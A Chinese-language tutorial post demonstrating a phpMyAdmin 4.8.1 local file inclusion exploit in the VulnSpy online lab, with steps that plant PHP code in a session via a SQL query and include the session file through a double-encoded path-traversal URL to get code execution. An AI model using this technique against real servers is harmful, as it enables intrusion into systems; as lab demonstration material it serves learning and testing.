phpMyAdmin 4.8.x 本地檔案包含漏洞利用

標籤：var   dex   本地   too   跳轉   tar   shel   ati   成功   

phpMyAdmin 4.8.x 本地檔案包含漏洞利用

今天ChaMd5安全團隊公開了一個phpMyAdmin最新版中的本地檔案包含漏洞：phpmyadmin4.8.1後台getshell。該漏洞利用不要求root帳號，只需能夠登入 phpMyAdmin 便能夠利用。

在這篇文章中我們將使用VulnSpy的線上 phpMyAdmin 環境來示範該漏洞的利用。

VulnSpy 線上 phpMyAdmin 環境地址：http://www.vulnspy.com/phpmyadmin-4.8.1/

漏洞細節

參照ChaMd5安全團隊發布的文章：phpmyadmin4.8.1後台getshell

漏洞利用

因為原文中包含資料庫檔案可能由於檔案許可權或者帳號許可權不足而無法利用，這裡我們將使用另外一種方式來利用該檔案包含漏洞，即包含session檔案。

1. 進入VulnSpy 線上 phpMyAdmin 環境地址，點擊 Start to Hack ，跳轉到VSPlate

2. 等待載入設定後，點擊 GO 按鈕開啟實驗

3. 實驗建立完成後，點擊示範地址進入實驗

4. 使用帳號 root ，密碼 toor 登入 phpMyAdmin

5. 點擊頂部導覽列中的SQL按鈕，執行SQL查詢

select ‘<?php phpinfo();exit;?>‘

6. 擷取自己的SESSION ID

你的 SESSION ID 為 Cookie 中的 phpMyAdmin 項。

這樣對應的SESSION檔案為/var/lib/php/sessions/sess_你的SESSION ID。

7. 包含SESSION檔案，成功利用該漏洞

http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k

GitHub 源碼

https://github.com/vulnspy/phpmyadmin-4.8.1

參考

【首發】phpmyadmin4.8.1後台getshell
phpMyAdmin 4.8.x LFI to RCE (Authorization Required) - https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/

phpMyAdmin 4.8.x 本地檔案包含漏洞利用